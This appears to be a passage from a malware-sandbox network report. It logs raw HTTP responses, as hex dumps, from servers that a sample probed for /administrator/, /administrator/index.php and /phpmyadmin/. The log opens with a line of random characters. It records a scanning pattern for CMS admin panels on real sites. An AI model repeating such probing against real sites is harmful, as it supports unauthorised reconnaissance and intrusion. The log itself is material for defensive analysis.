7cceJ&%@pTn][CZM.h;oq~b8U<qn<MGMeUVgptT.?(?9:?_?}w){+G?"_<cl!CyOn_XnUV?Ac?yn[(c6uM7Wx_YgEtc7coN6f%w5OcF#G0,w;afCF`5NkXn)aXQzFcme~: St\?H3w
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.25.3Date: Fri, 22 Dec 2023 20:14:51 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingContent-Encoding: gzipData Raw: 65 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 55 90 41 4f c3 30 0c 85 ef fd 15 66 67 98 07 da 31 8a 04 6b 27 26 95 31 a1 ec c0 31 2c 86 44 ca 92 91 b8 4c fd f7 24 1d 12 70 7c f6 f3 e7 67 8b ab f6 79 a5 5e 77 1d 3c aa a7 1e 76 fb 87 7e b3 82 d9 0d e2 a6 53 6b c4 56 b5 97 ce dd 7c 81 d8 6d 67 b2 11 96 8f 5e 0a 4b da 14 c1 8e 3d c9 e5 62 09 db c8 b0 8e 43 30 02 2f c5 46 e0 64 12 6f d1 8c 75 ee 56 fe f1 14 d5 88 93 54 96 20 d1 e7 40 99 c9 c0 fe a5 87 b3 ce 10 0a eb bd b2 20 06 60 eb 32 64 4a 5f 94 e6 02 4f d3 d8 bd 31 8e 5d 0c da fb f1 1a 34 fc 0b d0 50 4a 31 4d 20 0a 87 82 61 4a 05 7e b6 ce 13 70 1a 5d f8 00 8e 30 64 02 1d a0 ab e6 36 1e 86 23 05 ae 75 ab 83 a9 c6 df 64 3f 6b 71 3a a4 5c 55 1f d0 7c 03 59 3c e4 fe 3b 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: efUAO0fg1k'&11,DL$p\|gy^w<v~SkV\|mg^K=bC0/FdouVT @ `2dJ_O1]4PJ1M aJ~p]0d6#ud?kq:\U\|Y<;0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 22 Dec 2023 20:14:51 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 212Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /administrator/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: openresty/1.19.9.1Date: Fri, 22 Dec 2023 20:14:51 GMTContent-Type: text/htmlContent-Length: 575Connection: keep-aliveLast-Modified: Wed, 05 Oct 2011 15:41:30 GMTETag: "23f-4ae8f0ab47e80"Data Raw: 3c 64 69 76 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 3c 62 3e 34 30 34 3a 20 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 62 3e 0a 20 20 20 20 20 20 20 20 3c 62 72 2f 3e 0a 20 20 20 20 20 20 20 20 54 68 69 73 20 65 72 72 6f 72 20 69 73 20 67 65 6e 65 72 61 74 65 64 20 77 68 65 6e 20 74 68 65 72 65 20 77 61 73 20 6e 6f 20 77 65 62 20 70 61 67 65 20 77 69 74 68 20 74 68 65 20 6e 61 6d 65 20 79 6f 75 20 73 70 65 63 69 66 69 65 64 20 61 74 20 74 68 65 20 77 65 62 20 73 69 74 65 2e 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 3c 62 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 54 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 20 73 75 67 67 65 73 74 69 6f 6e 73 3a 0a 20 20 20 20 20 20 20 20 3c 2f 62 3e 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 45 6e 73 75 72 65 20 74 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 69 6e 6b 69 6e 67 20 74 6f 20 65 78 69 73 74 73 20 69 6e 20 74 68 65 20 63 6f 72 72 65 63 74 20 66 6f 6c 64 65 72 2e 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 43 68 65 63 6b 20 79 6f 75 72 20 66 69 6c 65 20 6e 61 6d 65 20 66 6f 72 20 63 61 73 65 20 73 65 6e 73 69 74 69 76 69 74 79 20 2e 20 49 6e 64 65 78 2e 68 74 6d 20 69 73 20 6e 6f 74 20 74 68 65 20 73 61 6d 65 20 61 73 20 69 6e 64 65 78 2e 68 74 6d 21 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 64 69 73 61 62 6c 65 20 61 6e 79 20 72 65 77 72 69 74 65 20 72 75 6c 65 73 20 62 79 20 72 65 6e 61 6d 69 6e 67 20 79 6f 75 72 20 2e 68 74 61 63 63 65 73 73 20 66 69 6c 65 20 69 66 20 69 74 20 65 78 69 73 74 73 2e 0a 20 20 20 20 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 0a Data Ascii: <div> <p> <b>404: Page not found</b> <br/> This error is generated when there was no web page with the name you specified at the web site. </p> <p> <b> Troubleshooting suggestions: </b> </p> <p> Ensure the page you are linking to exists in the correct folder. </p> <p> Check your file name for case sensitivity . Index.htm is not the same as index.htm! </p> <p> Temporarily disable any rewrite rules by renaming your .htaccess file if it exists. </p></div>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:51 GMTServer: Apache/2.4.6 (CentOS) PHP/5.4.16Content-Length: 209Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /phpmyadmin/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: openresty/1.19.9.1Date: Fri, 22 Dec 2023 20:14:51 GMTContent-Type: text/htmlContent-Length: 575Connection: keep-aliveLast-Modified: Wed, 05 Oct 2011 15:41:30 GMTETag: "23f-4ae8f0ab47e80"Data Raw: 3c 64 69 76 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 3c 62 3e 34 30 34 3a 20 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 62 3e 0a 20 20 20 20 20 20 20 20 3c 62 72 2f 3e 0a 20 20 20 20 20 20 20 20 54 68 69 73 20 65 72 72 6f 72 20 69 73 20 67 65 6e 65 72 61 74 65 64 20 77 68 65 6e 20 74 68 65 72 65 20 77 61 73 20 6e 6f 20 77 65 62 20 70 61 67 65 20 77 69 74 68 20 74 68 65 20 6e 61 6d 65 20 79 6f 75 20 73 70 65 63 69 66 69 65 64 20 61 74 20 74 68 65 20 77 65 62 20 73 69 74 65 2e 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 3c 62 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 54 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 20 73 75 67 67 65 73 74 69 6f 6e 73 3a 0a 20 20 20 20 20 20 20 20 3c 2f 62 3e 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 45 6e 73 75 72 65 20 74 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 69 6e 6b 69 6e 67 20 74 6f 20 65 78 69 73 74 73 20 69 6e 20 74 68 65 20 63 6f 72 72 65 63 74 20 66 6f 6c 64 65 72 2e 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 43 68 65 63 6b 20 79 6f 75 72 20 66 69 6c 65 20 6e 61 6d 65 20 66 6f 72 20 63 61 73 65 20 73 65 6e 73 69 74 69 76 69 74 79 20 2e 20 49 6e 64 65 78 2e 68 74 6d 20 69 73 20 6e 6f 74 20 74 68 65 20 73 61 6d 65 20 61 73 20 69 6e 64 65 78 2e 68 74 6d 21 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 64 69 73 61 62 6c 65 20 61 6e 79 20 72 65 77 72 69 74 65 20 72 75 6c 65 73 20 62 79 20 72 65 6e 61 6d 69 6e 67 20 79 6f 75 72 20 2e 68 74 61 63 63 65 73 73 20 66 69 6c 65 20 69 66 20 69 74 20 65 78 69 73 74 73 2e 0a 20 20 20 20 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 0a Data Ascii: <div> <p> <b>404: Page not found</b> <br/> This error is generated when there was no web page with the name you specified at the web site. </p> <p> <b> Troubleshooting suggestions: </b> </p> <p> Ensure the page you are linking to exists in the correct folder. </p> <p> Check your file name for case sensitivity . Index.htm is not the same as index.htm! </p> <p> Temporarily disable any rewrite rules by renaming your .htaccess file if it exists. </p></div>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:51 GMTServer: ApacheX-Powered-By: PHP/7.4.33Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://derrickandbriggs.com/wp-json/>; rel="https://api.w.org/"Vary: Accept-EncodingTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 32 30 63 33 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 44 65 72 72 69 63 6b 20 26 61 6d 70 3b 20 42 72 69 67 67 73 2c 20 4c 4c 50 44 65 72 72 69 63 6b 20 26 61 6d 70 3b 20 42 72 69 67 67 73 2c 20 4c 4c 50 3c 2f 74 69 74 6c 65 3e 0d 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 64 65 72 72 69 63 6b 61 6e 64 62 72 69 67 67 73 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 6b 61 6e 64 69 6e 73 6b 79 2f 73 74 79 6c 65 2e 63 73 73 3f 76 3d 33 2e 32 22 20 2f 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 68 74 6d 6c 35 73 68 69 76 2f 33 2e 37 2e 33 2f 68 74 6d 6c 35 73 68 69 76 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 31 34 2e 33 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 44 65 72 72 69 63 6b 20 26 61 6d 70 3b 20 42 72 69 67 67 73 2c 20 4c 4c 50 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:51 GMTContent-Type: text/html; charset=utf-8Connection: keep-alivex-wix-request-id: 1703276091.8361710117908132424Age: 0Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=42X-Seen-By: vmPhUNXuQemvc7fjBI8NWewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLjBdxec7r7DHGEpZo2ij+25kavE0ZtMXws1mfakihq4B,2d58ifebGbosy5xc+FRalnZCKOJV3ikusuy8uWMJmMugTMZw2nlpXujg3R2m5DXfsTf0Hk8TJ3ijVqdUOr14xg==,2UNV7KOq4oGjA5+PKsX47K15rLvEnClnBsBBVIBt3LYfbJaKSXYQ/lskq2jK6SGP,Uh3+FND4gW3xHL7Yw3zy0HOx5fM3NYGU2oh/PYLAjKs=,NiLFJErrWn2MoPxOC1BazFIbQpprQYuCl37UmHUfIeI=,WDMzHiyOL7uW518fW2Byr/DuP81vp3l5jzBVJBZ2tecGEgnzVEHSo/m3CLKFTqPNQdxShfsCZPIcY7uwFqSfuA==Vary: Accept-EncodingX-Content-Type-Options: nosniffContent-Encoding: gzipTransfer-Encoding: chunkedData Raw: 34 32 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 56 df 6f db 36 10 7e cf 5f c1 e8 45 2d 10 8a 71 d6 61 69 26 05 e8 b2 0c cb cb 30 6c 28 b0 a1 28 0a 5a 3c 5b 4c 28 52 25 29 ff 40 d7 ff 7d 77 94 ec 39 71 b0 c6 89 1f 6c f3 c8 bb fb be bb 23 ef 18 2b 8f 39 67 8c f3 cb a3 a3 f2 58 b9 3a ae 3b 60 4d 6c cd 25 ae 39 3f 62 f8 a1 dd 92 64 cc ce b9 ec ba 2a 5b ea d5 b5 f7 ce ff 2e e7 10 de 75 5d 46 07 40 aa 4b 3c 5f b6 10 25 b3 b2 85 2a 5b 68 58 76 ce c7 8c d5 ce 46 b0 91 54 55 6c 2a 05 0b 5d 03 4f 8b 13 6d 75 d4 d2 f0 50 4b 03 d5 e4 84 b5 72 a5 db be fd 4f d0 07 f0 69 25 a7 78 c2 3a f4 b7 71 54 37 d2 07 40 c3 7d 9c f1 f3 9d 8d 26 c6 8e c3 e7 5e 2f aa ec 2f fe fe 1d bf 72 6d 27 a3 46 0b 3b 70 6e ae 2b 50 73 18 f4 a2 8e 06 88 e4 54 5b 55 65 79 87 f4 3e 25 61 ce fe 61 d1 4b 1b 8c 8c 78 b8 14 49 fa 90 ae 82 50 7b dd 45 ed ec 8e 8b 1d 4c 07 44 65 4f cb bb a9 8b 61 c7 ae 75 88 12 56 27 cc ba 99 33 c6 2d 07 95 6d 42 29 75 a5 d1 f6 8e 51 52 ab 4c b7 48 47 74 76 9e b1 c6 c3 ac ca 84 58 2e 97 05 e6 b2 a8 5d 2b 66 12 53 e2 6c 81 5f 19 f3 60 aa 2c 34 98 ba ba 8f 8c e4 7b c6 07 d3 1b 4b 21 62 68 eb a2 93 5e 86 e8 3c 7a 4a 46 31 6f 94 e8 20 62 a3 bd e2 b8 1d d7 62 86 b5 10 c4 af 60 16 80 3a 32 ad 7f 91 35 6a 04 e4 37 b8 8e 6b 03 a1 01 c0 d2 19 d0 47 58 45 91 0e 88 14 f6 1d 9a 03 92 3d bd a7 42 c3 00 f0 ae 9f 1a 5d 8b 49 f1 c3 e4 6d 71 2a 42 72 2f 80 6a 1c 41 63 91 8f a2 04 f1 be ff 52 0c 95 5f 4e 9d 5a 33 23 ed bc ca 00 f3 8f Data Ascii: 427Vo6~_E-qai&0l((Z<[L(R%)@}w9ql#+9gX:;`Ml%9?bd[.u]F@K<_%[hXvFTUl]OmuPKrOi%x:qT7@}&^//rm'F;pn+PsT[Uey>%aaKxIP{ELDeOauV'3-mB)uQRLHGtvX.]+fSl_`,4{K!bh^<zJF1o bb`:25j7kGXE=B]ImqBr/jAcR_NZ3#
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Sucuri/CloudproxyDate: Fri, 22 Dec 2023 20:14:51 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Sucuri-ID: 17008X-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-Sucuri-Block: 2FA2Data Raw: 33 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 75 63 75 72 69 2e 6e 65 74 2f 73 75 63 75 72 69 2d 66 69 72 65 77 61 6c 6c 2d 62 6c 6f 63 6b 2e 63 73 73 22 20 2f 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 53 75 63 75 72 69 20 57 65 62 53 69 74 65 20 46 69 72 65 77 61 6c 6c 20 2d 20 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 61 70 70 2d 68 65 61 64 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 2f 61 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 2d 6e 65 61 72 74 65 78 74 22 3e 57 65 62 73 69 74 65 20 46 69 72 65 77 61 6c 6c 3c 2f 73 70 61 6e 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6c 69 6e 6b 22 3e 42 61 63 6b 20 74 6f 20 73 75 63 75 72 69 2e 6e 65 74 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 0a 0d 0a 31 63 63 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 70 70 2d 63 6f 6e 74 65 6e 74 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 22 3e 0a 3c 70 20 63 6c 61 73 73 3d 22 6d 65 64 69 75 6d 2d 74 65 78 74 22 3e 54 68 69 73 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 74 72 79 69 6e 67 20 74 6f 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:51 GMTServer: ApacheLast-Modified: Thu, 26 Jul 2007 15:09:38 GMTETag: "8d7ff8d4-2b5-4362c03e5f083"Accept-Ranges: bytesContent-Length: 693Content-Type: text/html
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:51 GMTServer: Apache/2.4.6 (CentOS) PHP/5.4.16Content-Length: 212Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /administrator/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.25.3Date: Fri, 22 Dec 2023 20:14:51 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingContent-Encoding: gzipData Raw: 65 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 55 90 41 4f c3 30 0c 85 ef fd 15 66 67 98 07 da 31 8a 04 6b 27 26 95 31 a1 ec c0 31 2c 86 44 ca 92 91 b8 4c fd f7 24 1d 12 70 7c f6 f3 e7 67 8b ab f6 79 a5 5e 77 1d 3c aa a7 1e 76 fb 87 7e b3 82 d9 0d e2 a6 53 6b c4 56 b5 97 ce dd 7c 81 d8 6d 67 b2 11 96 8f 5e 0a 4b da 14 c1 8e 3d c9 e5 62 09 db c8 b0 8e 43 30 02 2f c5 46 e0 64 12 6f d1 8c 75 ee 56 fe f1 14 d5 88 93 54 96 20 d1 e7 40 99 c9 c0 fe a5 87 b3 ce 10 0a eb bd b2 20 06 60 eb 32 64 4a 5f 94 e6 02 4f d3 d8 bd 31 8e 5d 0c da fb f1 1a 34 fc 0b d0 50 4a 31 4d 20 0a 87 82 61 4a 05 7e b6 ce 13 70 1a 5d f8 00 8e 30 64 02 1d a0 ab e6 36 1e 86 23 05 ae 75 ab 83 a9 c6 df 64 3f 6b 71 3a a4 5c 55 1f d0 7c 03 59 3c e4 fe 3b 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: efUAO0fg1k'&11,DL$p\|gy^w<v~SkV\|mg^K=bC0/FdouVT @ `2dJ_O1]4PJ1M aJ~p]0d6#ud?kq:\U\|Y<;0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 22 Dec 2023 20:14:51 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 221Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /administrator/index.php was not found on this server.</p></body></html>
